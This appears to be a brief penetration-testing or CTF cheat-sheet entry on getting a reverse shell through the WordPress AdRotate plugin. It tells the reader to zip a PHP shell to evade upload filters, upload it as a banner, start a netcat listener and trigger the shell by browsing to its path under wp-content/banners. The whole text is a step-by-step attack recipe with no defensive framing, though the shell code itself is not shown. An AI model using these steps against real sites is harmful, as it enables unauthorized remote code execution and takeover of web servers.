AdRotate

AdRotate Plugin

[1] sudo zip shelly.zip shelly.php #move shell to zip file if there are upload restrictions for php

[2]Click on AdRotate → Upload New Files → Banners → Browse (select the malicious zip file just created)

[3]Start a nc listener

Trigger by navigating to wordpress/wp-content/banners/shelly.php

#Important!Although file uploaded is shelly.zip, to trigger you specify shelly.php